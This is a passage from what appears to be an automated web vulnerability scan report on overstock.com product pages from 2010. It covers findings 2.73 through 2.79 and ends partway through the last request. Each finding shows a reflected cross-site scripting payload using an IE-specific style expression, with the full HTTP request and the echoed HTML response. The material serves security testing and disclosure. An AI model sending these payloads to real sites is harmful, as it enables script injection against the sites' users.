Host:   http://www.overstock.com
Path:   /Clothing-Shoes/Ruby-Womens-Ruche-Dress/4662671/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 77013"style%3d"x%3aexpression(alert(1))"cc09ed7b953 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 77013"style="x:expression(alert(1))"cc09ed7b953 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Clothing-Shoes/Ruby-Womens-Ruche-Dress/4662671/product.html?77013"style%3d"x%3aexpression(alert(1))"cc09ed7b953=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:54:52 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:54:52 GMT
Pragma: no-cache
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289408092192:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:54:52 GMT; Path=/
Set-Cookie: mxcproclicks=4662671|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:54:52 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Keep-Alive: timeout=5, max=92
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 107051

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j13.overstock.com ssl:false -->


<head>

<title>Ru
...[SNIP]...
<input type="hidden" name="77013"style="x:expression(alert(1))"cc09ed7b953" value="1"/>
...[SNIP]...

2.73. http://www.overstock.com/Clothing-Shoes/Steve-Madden-Mens-Bigg-Slip-on-Loafers/4224471/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/Steve-Madden-Mens-Bigg-Slip-on-Loafers/4224471/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 93964"style%3d"x%3aexpression(alert(1))"917236cdfca was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 93964"style="x:expression(alert(1))"917236cdfca in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Clothing-Shoes/Steve-Madden-Mens-Bigg-Slip-on-Loafers/4224471/product.html?93964"style%3d"x%3aexpression(alert(1))"917236cdfca=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:56:11 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:56:11 GMT
Pragma: no-cache
Set-Cookie: cinfo=ccnt^0:ctmst^1289408171879:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:56:11 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxcproclicks=4224471|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:56:11 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 118836

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j20.overstock.com ssl:false -->


<head>

<title>St
...[SNIP]...
<input type="hidden" name="93964"style="x:expression(alert(1))"917236cdfca" value="1"/>
...[SNIP]...

2.74. http://www.overstock.com/Clothing-Shoes/Steve-Madden-Mens-Dutch-Low-Boots/4050883/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/Steve-Madden-Mens-Dutch-Low-Boots/4050883/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c3702"style%3d"x%3aexpression(alert(1))"896647dec7d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c3702"style="x:expression(alert(1))"896647dec7d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Clothing-Shoes/Steve-Madden-Mens-Dutch-Low-Boots/4050883/product.html?c3702"style%3d"x%3aexpression(alert(1))"896647dec7d=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:55:57 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:55:57 GMT
Pragma: no-cache
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289408157236:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=4050883|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:55:57 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:55:57 GMT; Path=/
Keep-Alive: timeout=5, max=94
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 125087

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j12.overstock.com ssl:false -->


<head>

<title>St
...[SNIP]...
<input type="hidden" name="c3702"style="x:expression(alert(1))"896647dec7d" value="1"/>
...[SNIP]...

2.75. http://www.overstock.com/Clothing-Shoes/Steven-by-Steve-Madden-Womens-Link-Leather-Boots/5113676/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/Steven-by-Steve-Madden-Womens-Link-Leather-Boots/5113676/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5502"style%3d"x%3aexpression(alert(1))"44ef05ee2ed was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e5502"style="x:expression(alert(1))"44ef05ee2ed in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Clothing-Shoes/Steven-by-Steve-Madden-Womens-Link-Leather-Boots/5113676/product.html?e5502"style%3d"x%3aexpression(alert(1))"44ef05ee2ed=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 15:52:58 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 15:52:58 GMT
Pragma: no-cache
Set-Cookie: cinfo=ccnt^0:ctmst^1289404378222:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 15:52:58 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxcproclicks=5113676|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 15:52:58 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=49
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 123311

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j20.overstock.com ssl:false -->


<head>

<title>St
...[SNIP]...
<input type="hidden" name="e5502"style="x:expression(alert(1))"44ef05ee2ed" value="1"/>
...[SNIP]...

2.76. http://www.overstock.com/Clothing-Shoes/Tommy-Hilfiger-Womens-Down-Filled-Jacket/5230221/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/Tommy-Hilfiger-Womens-Down-Filled-Jacket/5230221/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bc162"style%3d"x%3aexpression(alert(1))"b5cde70494e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bc162"style="x:expression(alert(1))"b5cde70494e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Clothing-Shoes/Tommy-Hilfiger-Womens-Down-Filled-Jacket/5230221/product.html?bc162"style%3d"x%3aexpression(alert(1))"b5cde70494e=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:54:51 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:54:51 GMT
Pragma: no-cache
Set-Cookie: cinfo=ccnt^0:ctmst^1289408091403:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:54:51 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxcproclicks=5230221|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:54:51 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=88
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 108513

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j20.overstock.com ssl:false -->


<head>

<title>To
...[SNIP]...
<input type="hidden" name="bc162"style="x:expression(alert(1))"b5cde70494e" value="1"/>
...[SNIP]...

2.77. http://www.overstock.com/Clothing-Shoes/Trotta-Pagano-Womens-Lucetta-Italian-Leather-Knee-high-Boots/5108339/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/Trotta-Pagano-Womens-Lucetta-Italian-Leather-Knee-high-Boots/5108339/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 78e64"style%3d"x%3aexpression(alert(1))"6d0eb2c7d50 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 78e64"style="x:expression(alert(1))"6d0eb2c7d50 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Clothing-Shoes/Trotta-Pagano-Womens-Lucetta-Italian-Leather-Knee-high-Boots/5108339/product.html?78e64"style%3d"x%3aexpression(alert(1))"6d0eb2c7d50=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:55:56 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:55:56 GMT
Pragma: no-cache
Set-Cookie: mxcproclicks=5108339|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:55:56 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289408156555:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:55:56 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=28
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 113511

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j16.overstock.com ssl:false -->


<head>

<title>Tr
...[SNIP]...
<input type="hidden" name="78e64"style="x:expression(alert(1))"6d0eb2c7d50" value="1"/>
...[SNIP]...

2.78. http://www.overstock.com/Clothing-Shoes/U-I-Mens-Solid-Black-Suit/3142267/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/U-I-Mens-Solid-Black-Suit/3142267/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b093d"style%3d"x%3aexpression(alert(1))"48619d077d1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b093d"style="x:expression(alert(1))"48619d077d1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Clothing-Shoes/U-I-Mens-Solid-Black-Suit/3142267/product.html?b093d"style%3d"x%3aexpression(alert(1))"48619d077d1=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 15:58:37 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 15:58:37 GMT
Pragma: no-cache
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 15:58:37 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=3142267|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 15:58:37 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289404717788:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=75
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 116933

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j14.overstock.com ssl:false -->


<head>

<title>U&
...[SNIP]...
<input type="hidden" name="b093d"style="x:expression(alert(1))"48619d077d1" value="1"/>
...[SNIP]...

2.79. http://www.overstock.com/Clothing-Shoes/Urban-Eyes-Aviator-Womens-Sunglasses/4878052/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/Urban-Eyes-Aviator-Womens-Sunglasses/4878052/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9552e"style%3d"x%3aexpression(alert(1))"a9a967e2da5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9552e"style="x:expression(alert(1))"a9a967e2da5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Clothing-Shoes/Urban-Eyes-Aviator-Womens-Sunglasses/4878052/product.html?9552e"style%3d"x%3aexpression(alert(1))"a9a967e2da5=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
